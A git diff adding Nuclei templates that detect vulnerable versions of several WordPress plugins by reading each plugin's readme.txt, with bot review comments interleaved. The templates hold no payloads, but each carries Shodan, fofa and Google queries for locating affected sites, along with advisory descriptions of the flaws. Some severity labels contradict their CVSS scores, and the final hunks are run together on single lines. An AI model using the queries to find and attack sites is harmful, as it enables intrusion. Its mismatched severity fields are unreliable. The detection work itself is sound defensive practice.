+ author: topscoder
+ severity: medium
+ description: >
+ The Accept Authorize.NET Payments Using Contact Form 7 plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.2 via the cf7adn-info.php file. This makes it possible for unauthenticated attackers to extract configuration data which can be used to aid in other attacks.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/d8801b9a-afcb-483b-a018-4f68448e96de?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2024-12250
+ metadata:
+ fofa-query: "wp-content/plugins/accept-authorize-net-payments-using-contact-form-7/"
+ google-query: inurl:"/wp-content/plugins/accept-authorize-net-payments-using-contact-form-7/"
+ shodan-query: 'vuln:CVE-2024-12250'
+ tags: cve,wordpress,wp-plugin,accept-authorize-net-payments-using-contact-form-7,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/accept-authorize-net-payments-using-contact-form-7/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "accept-authorize-net-payments-using-contact-form-7"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-12259.yaml b/poc/cve/CVE-2024-12259.yaml
new file mode 100644
index 0000000000..1bcd531ff0
--- /dev/null
+++ b/poc/cve/CVE-2024-12259.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-12259-344ffbf5ed79000bc36568816138482f
+
+info:
+ name: >
+ CRM WordPress Plugin – RepairBuddy <= 3.8120 - Missing Authorization to Account Takeover/Privilege Escalation
+ author: topscoder
+ severity: low
+ description: >
+ The CRM WordPress Plugin – RepairBuddy plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 3.8120. This is due to the plugin not properly validating a user's identity prior to updating their email through the wc_update_user_data AJAX action. This makes it possible for authenticated attackers, with subscriber-level access and above, to change arbitrary user's email addresses, including administrators, and leverage that to reset the user's password and gain access to their account.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/80997d2f-3e16-48f6-969b-58844cb83d53?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.8
+ cve-id: CVE-2024-12259
+ metadata:
+ fofa-query: "wp-content/plugins/computer-repair-shop/"
+ google-query: inurl:"/wp-content/plugins/computer-repair-shop/"
+ shodan-query: 'vuln:CVE-2024-12259'
+ tags: cve,wordpress,wp-plugin,computer-repair-shop,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/computer-repair-shop/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "computer-repair-shop"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.8120')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-12287.yaml b/poc/cve/CVE-2024-12287.yaml
new file mode 100644
index 0000000000..45f80c6127
--- /dev/null
+++ b/poc/cve/CVE-2024-12287.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-12287-8c4acd957f17d47a30609f0209cc76f3
+
+info:
+ name: >
+ Biagiotti Membership <= 1.0.2 - Authentication Bypass via biagiotti_membership_check_facebook_user
+ author: topscoder
+ severity: critical
+ description: >
+ The Biagiotti Membership plugin for WordPress is vulnerable to authentication bypass in all versions up to, and including, 1.0.2. This is due to the plugin not properly verifying a user's identity prior to authenticating them. This makes it possible for unauthenticated attackers to log in as other users, such as administrators, granted they have access to an email.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/12f319df-41eb-484a-8fca-af6ae76f4179?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 9.8
+ cve-id: CVE-2024-12287
+ metadata:
+ fofa-query: "wp-content/plugins/biagiotti-membership/"
+ google-query: inurl:"/wp-content/plugins/biagiotti-membership/"
+ shodan-query: 'vuln:CVE-2024-12287'
+ tags: cve,wordpress,wp-plugin,biagiotti-membership,critical
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/biagiotti-membership/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "biagiotti-membership"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.2')
\ No newline at end of file
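Review bot: The two `name: version` extractors are identical except for `internal: true` on the first, which reads as an accidental duplicate until the reader works out that one feeds `compare_versions()` silently and the other surfaces the extracted version in the scan output; a comment would stop the next maintainer from deleting one. Something like `# first extractor feeds compare_versions() without printing; the second reports the version in results` above `extractors:` would do. Whether a single non-internal extractor could serve both purposes is not verifiable from this hunk, so the comment is the safer change; the same pattern is repeated in every template in this commit.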
diff --git a/poc/cve/CVE-2024-12331-1b3375d194cd3870eb15fbe759b10ed7.yaml b/poc/cve/CVE-2024-12331-1b3375d194cd3870eb15fbe759b10ed7.yaml
new file mode 100644
index 0000000000..48fb94150b
--- /dev/null
+++ b/poc/cve/CVE-2024-12331-1b3375d194cd3870eb15fbe759b10ed7.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-12331-1b3375d194cd3870eb15fbe759b10ed7
+
+info:
+ name: >
+ File Manager Pro – Filester <= 1.8.6 - Missing Authorization to Authenticated (Subscriber+) Filebird Plugin Installation
+ author: topscoder
+ severity: low
+ description: >
+ The File Manager Pro – Filester plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'ajax_install_plugin' function in all versions up to, and including, 1.8.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to install the Filebird plugin.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/5b09bfff-4d6e-4de0-b6ab-6ac27c4f2be6?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-12331
+ metadata:
+ fofa-query: "wp-content/plugins/filester/"
+ google-query: inurl:"/wp-content/plugins/filester/"
+ shodan-query: 'vuln:CVE-2024-12331'
+ tags: cve,wordpress,wp-plugin,filester,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/filester/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "filester"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.8.6')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-12340.yaml b/poc/cve/CVE-2024-12340.yaml
new file mode 100644
index 0000000000..3ce52c087d
--- /dev/null
+++ b/poc/cve/CVE-2024-12340.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-12340-e574ab0a95b2364359c38e28de3f4115
+
+info:
+ name: >
+ Animation Addons for Elementor <= 1.1.6 - Authenticated (Contributor+) Sensitive Information Exposure via Content Slider and Tabs Widget Elementor Template
+ author: topscoder
+ severity: low
+ description: >
+ The Animation Addons for Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.1.6 via the 'render' function in widgets/content-slider.php and widgets/tabs.php. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, and draft Elementor template data.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/1a0136e2-97f5-4368-a805-0f60d1b8ad11?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-12340
+ metadata:
+ fofa-query: "wp-content/plugins/animation-addons-for-elementor/"
+ google-query: inurl:"/wp-content/plugins/animation-addons-for-elementor/"
+ shodan-query: 'vuln:CVE-2024-12340'
+ tags: cve,wordpress,wp-plugin,animation-addons-for-elementor,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/animation-addons-for-elementor/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "animation-addons-for-elementor"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1.6')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-12432.yaml b/poc/cve/CVE-2024-12432.yaml
new file mode 100644
index 0000000000..eb692d6ec9
--- /dev/null
+++ b/poc/cve/CVE-2024-12432.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-12432-5b5915220e6a42abeb51e9b392575c63
+
+info:
+ name: >
+ WPC Shop as a Customer for WooCommerce <= 1.2.8 - Authentication Bypass Due to Insufficiently Unique Key
+ author: topscoder
+ severity: low
+ description: >
+ The WPC Shop as a Customer for WooCommerce plugin for WordPress is vulnerable to account takeover and privilege escalation in all versions up to, and including, 1.2.8. This is due to the 'generate_key' function not producing a sufficiently random value. This makes it possible for authenticated attackers, with Subscriber-level access and above, to log in as site administrators, granted they have triggered the ajax_login() function which generates a unique key that can be used to log in.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/048625e8-10b7-418d-a13b-329f1d7e0171?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
+ cvss-score: 8.1
+ cve-id: CVE-2024-12432
+ metadata:
+ fofa-query: "wp-content/plugins/wpc-shop-as-customer/"
+ google-query: inurl:"/wp-content/plugins/wpc-shop-as-customer/"
+ shodan-query: 'vuln:CVE-2024-12432'
+ tags: cve,wordpress,wp-plugin,wpc-shop-as-customer,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/wpc-shop-as-customer/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "wpc-shop-as-customer"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.8')
\ No newline at end of file
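Review bot: The `cvss-metrics` vector carries `PR:N` while the description states that exploitation requires `Subscriber-level access and above`, and `severity: low` sits next to `cvss-score: 8.1`; at least one of these three fields is wrong, and anything filtering on the vector would classify this as an unauthenticated issue while anything filtering on severity would deprioritize it. The vector and score are presumably copied from the upstream advisory, so which field is authoritative cannot be settled from this hunk; at minimum `severity: high` matches the score, and the `PR:` component should be checked against the referenced Wordfence entry and the description corrected to agree with it.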
diff --git a/poc/cve/CVE-2024-12449.yaml b/poc/cve/CVE-2024-12449.yaml
new file mode 100644
index 0000000000..3a52bc6d9d
--- /dev/null
+++ b/poc/cve/CVE-2024-12449.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-12449-8a82767d9800d12163c96ba6ad7adf65
+
+info:
+ name: >
+ Video Share VOD – Turnkey Video Site Builder Script <= 2.6.30 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Video Share VOD – Turnkey Video Site Builder Script plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'videowhisper_player_html' shortcode in all versions up to, and including, 2.6.30 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/b857e64c-a345-4ed3-b690-5b9d1a0cae15?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-12449
+ metadata:
+ fofa-query: "wp-content/plugins/video-share-vod/"
+ google-query: inurl:"/wp-content/plugins/video-share-vod/"
+ shodan-query: 'vuln:CVE-2024-12449'
+ tags: cve,wordpress,wp-plugin,video-share-vod,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/video-share-vod/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "video-share-vod"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.6.30')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-12454.yaml b/poc/cve/CVE-2024-12454.yaml
new file mode 100644
index 0000000000..88ce5f9379
--- /dev/null
+++ b/poc/cve/CVE-2024-12454.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-12454-5621596be5bd586ce99dcc404a2f85f8
+
+info:
+ name: >
+ Affiliate Program Suite — SliceWP Affiliates <= 1.1.23 - Cross-Site Request Forgery to Reflected Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+ The Affiliate Program Suite — SliceWP Affiliates plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.23. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/73aad911-531b-4118-9d39-27cbae75db01?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cve-id: CVE-2024-12454
+ metadata:
+ fofa-query: "wp-content/plugins/slicewp/"
+ google-query: inurl:"/wp-content/plugins/slicewp/"
+ shodan-query: 'vuln:CVE-2024-12454'
+ tags: cve,wordpress,wp-plugin,slicewp,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/slicewp/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "slicewp"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1.23')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-12500.yaml b/poc/cve/CVE-2024-12500.yaml
new file mode 100644
index 0000000000..14c86607bd
--- /dev/null
+++ b/poc/cve/CVE-2024-12500.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-12500-fda26400f9dece6114dcd6955fceb5ac
+
+info:
+ name: >
+ Philantro – Donations and Donor Management <= 5.2 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Philantro – Donations and Donor Management plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes like 'donate' in all versions up to, and including, 5.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/0cd2ad77-c5de-470d-bc17-729233e4ab92?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-12500
+ metadata:
+ fofa-query: "wp-content/plugins/philantro/"
+ google-query: inurl:"/wp-content/plugins/philantro/"
+ shodan-query: 'vuln:CVE-2024-12500'
+ tags: cve,wordpress,wp-plugin,philantro,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/philantro/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "philantro"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 5.2')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-12513.yaml b/poc/cve/CVE-2024-12513.yaml
new file mode 100644
index 0000000000..6dcbc06529
--- /dev/null
+++ b/poc/cve/CVE-2024-12513.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-12513-826c2ee2f56d5d07458720b488403657
+
+info:
+ name: >
+ Contests by Rewards Fuel <= 2.0.65 - Authenticated (Contributor+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Contests by Rewards Fuel plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'RF_CONTEST' shortcode in all versions up to, and including, 2.0.65 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/c89934b1-5e3c-4bf2-8d36-17c4268ccd4e?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-12513
+ metadata:
+ fofa-query: "wp-content/plugins/contests-from-rewards-fuel/"
+ google-query: inurl:"/wp-content/plugins/contests-from-rewards-fuel/"
+ shodan-query: 'vuln:CVE-2024-12513'
+ tags: cve,wordpress,wp-plugin,contests-from-rewards-fuel,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/contests-from-rewards-fuel/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "contests-from-rewards-fuel"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.0.65')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-12554.yaml b/poc/cve/CVE-2024-12554.yaml
new file mode 100644
index 0000000000..af6e40fef6
--- /dev/null
+++ b/poc/cve/CVE-2024-12554.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-12554-f7e364a88d43fcf0d377a1e86841f6a0
+
+info:
+ name: >
+ Peter’s Custom Anti-Spam <= 3.2.3 - Cross-Site Request Forgery via cas_register_post Function
+ author: topscoder
+ severity: medium
+ description: >
+ The Peter’s Custom Anti-Spam plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 3.2.3. This is due to missing nonce validation on the cas_register_post() function. This makes it possible for unauthenticated attackers to blacklist emails via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/3c52ca89-4f13-41da-bc10-80d212c6219c?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:L
+ cvss-score: 5.4
+ cve-id: CVE-2024-12554
+ metadata:
+ fofa-query: "wp-content/plugins/peters-custom-anti-spam-image/"
+ google-query: inurl:"/wp-content/plugins/peters-custom-anti-spam-image/"
+ shodan-query: 'vuln:CVE-2024-12554'
+ tags: cve,wordpress,wp-plugin,peters-custom-anti-spam-image,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/peters-custom-anti-spam-image/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "peters-custom-anti-spam-image"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 3.2.3')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-12560-449215acaf31dbe73bdd1b194455c475.yaml b/poc/cve/CVE-2024-12560-449215acaf31dbe73bdd1b194455c475.yaml
new file mode 100644
index 0000000000..b57bb061f4
--- /dev/null
+++ b/poc/cve/CVE-2024-12560-449215acaf31dbe73bdd1b194455c475.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-12560-449215acaf31dbe73bdd1b194455c475
+
+info:
+ name: >
+ Button Block – Get fully customizable & multi-functional buttons <= 1.1.5 - Authenticated (Contributor+) Post Disclosure via Post Duplication
+ author: topscoder
+ severity: low
+ description: >
+ The Button Block – Get fully customizable & multi-functional buttons plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.1.5 via the 'btn_block_duplicate_post' function. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract potentially sensitive data from draft, scheduled (future), private, and password protected posts.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/ac55e988-2b41-459b-9ab1-e5f9fdca203f?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-12560
+ metadata:
+ fofa-query: "wp-content/plugins/button-block/"
+ google-query: inurl:"/wp-content/plugins/button-block/"
+ shodan-query: 'vuln:CVE-2024-12560'
+ tags: cve,wordpress,wp-plugin,button-block,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/button-block/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "button-block"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1.5')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-12596.yaml b/poc/cve/CVE-2024-12596.yaml
new file mode 100644
index 0000000000..1555a240f0
--- /dev/null
+++ b/poc/cve/CVE-2024-12596.yaml
@@ -0,0 +1,59 @@ +id: CVE-2024-12596-774434bb9ea28259fa8266e81972c00f + +info: + name: > + LifterLMS – WP LMS for eLearning, Online Courses, & Quizzes <= 7.8.5 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Post Deletion + author: topscoder + severity: low + description: > + The LifterLMS – WP LMS for eLearning, Online Courses, & Quizzes plugin for WordPress is vulnerable to arbitrary post deletion due to a missing capability check on the 'llms_delete_cert' action in all versions up to, and including, 7.8.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary posts. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/8e75a03b-7552-4228-a4d0-13c78d20f6d5?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-12596 + metadata: + fofa-query: "wp-content/plugins/lifterlms/" + google-query: inurl:"/wp-content/plugins/lifterlms/" + shodan-query: 'vuln:CVE-2024-12596' + tags: cve,wordpress,wp-plugin,lifterlms,low + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/lifterlms/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "lifterlms" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 7.8.5') \ No newline at end of file diff --git a/poc/cve/CVE-2024-12626-300286d442729c59242e3ed40a31f2a5.yaml b/poc/cve/CVE-2024-12626-300286d442729c59242e3ed40a31f2a5.yaml new file mode 100644 index 0000000000..971131143f --- /dev/null 
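Review bot: `severity: low` and the trailing `low` tag disagree with the template's own `cvss-score: 4.3`, which sits in the CVSS medium band (4.0–6.9) that nuclei's severity convention follows; for arbitrary post deletion by any Subscriber the consistent values are `severity: medium` and `tags: cve,wordpress,wp-plugin,lifterlms,medium`. As with its siblings the check is readme-version inference only — the `llms_delete_cert` action is never invoked — which is worth one sentence in the description so a hit is not read as a confirmed deletion primitive.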
+++ b/poc/cve/CVE-2024-12626-300286d442729c59242e3ed40a31f2a5.yaml 
@@ -0,0 +1,59 @@ +id: CVE-2024-12626-300286d442729c59242e3ed40a31f2a5 + +info: + name: > + AutomatorWP <= 5.0.9 - Reflected Cross-Site Scripting via a-0-o-search_field_value + author: topscoder + severity: medium + description: > + The AutomatorWP – Automator plugin for no-code automations, webhooks & custom integrations in WordPress plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the ‘a-0-o-search_field_value’ parameter in all versions up to, and including, 5.0.9 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. When used in conjunction with the plugin's import and code action feature, this vulnerability can be leveraged to execute arbitrary code. + reference: + - https://github.com/topscoder/nuclei-wordfence-cve + - https://www.wordfence.com/threat-intel/vulnerabilities/id/c8abcc7b-6c68-4fc8-81af-e88624e417dd?source=api-prod + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H + cvss-score: 9.6 + cve-id: CVE-2024-12626 + metadata: + fofa-query: "wp-content/plugins/automatorwp/" + google-query: inurl:"/wp-content/plugins/automatorwp/" + shodan-query: 'vuln:CVE-2024-12626' + tags: cve,wordpress,wp-plugin,automatorwp,medium + +http: + - method: GET + redirects: true + max-redirects: 3 + path: + - "{{BaseURL}}/wp-content/plugins/automatorwp/readme.txt" + + extractors: + - type: regex + name: version + part: body + group: 1 + internal: true + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + - type: regex + name: version + part: body + group: 1 + regex: + - "(?mi)Stable tag: ([0-9.]+)" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + words: + - "automatorwp" + part: body + + - type: dsl + dsl: + - compare_versions(version, '<= 5.0.9') \ No newline at end of file 
